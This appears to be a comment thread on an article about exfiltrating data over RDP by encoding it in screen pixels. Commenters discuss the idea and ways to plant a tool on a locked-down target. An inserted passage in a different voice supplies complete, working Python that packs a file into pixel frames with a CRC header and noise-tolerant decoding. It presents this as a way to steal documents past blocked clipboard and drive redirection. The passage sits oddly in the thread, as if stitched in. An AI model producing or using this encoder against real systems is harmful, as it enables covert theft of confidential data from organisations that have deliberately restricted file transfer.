Bizarre security
so .. you're saying RDP has a feature to block file transfer outwards yet still allows remote execution?
Why not just ftp it ?
It's the kind of thinking you expect from someone who lives in a volcano lair: exfiltrating data from remote screen pixel values. The idea comes from Pen Test Partners' Alan Monie, taking a break from sex toy hacks and wondering how to get data over a connection like RDP (remote desktop protocol) when the target had blocked …
The fine article says the victim doesn't see the data screens, they're only displayed on the attacker's end. I don't understand why not, though. Don't know enough about the plumbing of GUIs (like, anything at all, really) but how can the standard Windows RDP server be tricked into inserting pixels into the bytestream going to the attacker, if they're not in the frame being displayed to the user on the console?
Almost 25 years ago the Timex Datalink watch could be programmed by placing it against a monitor and flashing pixels at it. This seems to just be a higher bandwidth version of that.
The problem appears to be in getting the screen flashing code onto the target. One could avoid having to do that by using a 'type', 'cat' or some hex dump command and running virtual OCR software at the receiving end. Slower but easier to pull off.
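To make the "flash the data as pixel values" idea in the posts above concrete, here is an added example that is not from the article, from Pen Test Partners, or from any commenter. It models the target's screen as a plain list of RGB rows (no real GUI or RDP involved, so it runs offline) and encodes a file as 2 bits per colour channel with a length and CRC32 header, so the receiving side can check it got the whole thing intact. The four-level quantisation goes a bit beyond what the posts describe: it is an assumption added here so the decoder survives the kind of small per-pixel error a lossy remote-display codec might introduce, and the noise function below just simulates that. Frame size, header layout and level spacing are all my choices, not anything the article specifies.

```python
import random
import zlib

# Four brightness levels per channel = 2 bits per channel, 6 bits per pixel.
# Levels are 85 apart, so any per-channel error below 42 still decodes to
# the right symbol. (Assumption: a lossy display codec perturbs pixels by
# roughly that much; tune the level count if your transport is cleaner.)
LEVELS = (0, 85, 170, 255)


def _nearest_level(value):
    """Map a 0..255 channel value back to the index of the closest level."""
    return min(range(len(LEVELS)), key=lambda i: abs(LEVELS[i] - value))


def capacity_bytes(width, height):
    """Payload bytes one frame can carry after the 8-byte header."""
    return (width * height * 3) // 4 - 8


def encode_frame(payload, width, height):
    """Render payload into a width x height frame of (r, g, b) tuples.

    Layout: 4-byte big-endian length, 4-byte CRC32, then the payload,
    each byte split into four 2-bit symbols, three symbols per pixel.
    """
    if len(payload) > capacity_bytes(width, height):
        raise ValueError("payload does not fit in one frame")
    header = len(payload).to_bytes(4, "big") + zlib.crc32(payload).to_bytes(4, "big")
    symbols = [(b >> shift) & 3 for b in header + payload for shift in (6, 4, 2, 0)]
    while len(symbols) % 3:
        symbols.append(0)  # pad the last pixel
    frame = [[(0, 0, 0)] * width for _ in range(height)]
    for i in range(len(symbols) // 3):
        r, g, b = (LEVELS[s] for s in symbols[3 * i:3 * i + 3])
        frame[i // width][i % width] = (r, g, b)
    return frame


def decode_frame(frame):
    """Recover the payload from a captured frame; raise ValueError if damaged."""
    symbols = [_nearest_level(c) for row in frame for pixel in row for c in pixel]
    data = bytearray()
    for i in range(0, len(symbols) - len(symbols) % 4, 4):
        data.append((symbols[i] << 6) | (symbols[i + 1] << 4)
                    | (symbols[i + 2] << 2) | symbols[i + 3])
    if len(data) < 8:
        raise ValueError("frame too small for header")
    length = int.from_bytes(data[:4], "big")
    expected_crc = int.from_bytes(data[4:8], "big")
    payload = bytes(data[8:8 + length])
    if len(payload) != length:
        raise ValueError("truncated payload")
    if zlib.crc32(payload) != expected_crc:
        raise ValueError("CRC mismatch: frame corrupted in transit")
    return payload


def add_noise(frame, max_delta, seed=0):
    """Simulate a lossy display codec by jittering every channel by up to max_delta."""
    rng = random.Random(seed)
    return [[tuple(max(0, min(255, c + rng.randint(-max_delta, max_delta)))
                   for c in pixel) for pixel in row] for row in frame]


if __name__ == "__main__":
    # Constructed sample "file"; a real run would read the target's document.
    secret = b"CONFIDENTIAL: payroll export 2024-Q1\n" * 4
    screen = encode_frame(secret, 64, 8)
    received = add_noise(screen, max_delta=40)
    print(decode_frame(received) == secret)  # True
```

One frame at 64 x 8 pixels carries only 376 bytes, but the same scheme at 1920 x 1080 with 2 bits per channel is about 1.5 MB per frame, which is why a blocked clipboard and blocked drive redirection do nothing against this: the pixels have to reach the operator's screen for RDP to work at all. The header and CRC matter in practice because a lossy codec or a partially repainted frame otherwise hands you silently corrupted data.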
There are various ways of getting something onto a target system. One of the most obvious is to just download the file from the Internet - there is often some external connectivity available which can be used. Another option is to use keyboard automation on the client system which just types the program in for the user; relatively simple, if slow, scripting would work.
All this depends on how locked down the server is - I have come across some that were very proficiently locked down... and others not so of course.
It still requires injecting the RAT somewhere in the pipe, but would allow folks to pull data that should not otherwise move. The weird screen view would be on the receiving end, who <should> be expecting it. If you see it on your RDP sessions and you aren't expecting it -- you're already too late as your (desktop/laptop/tool of choice) has been shanghaied for quite some time, and the results have likely already flown the coop.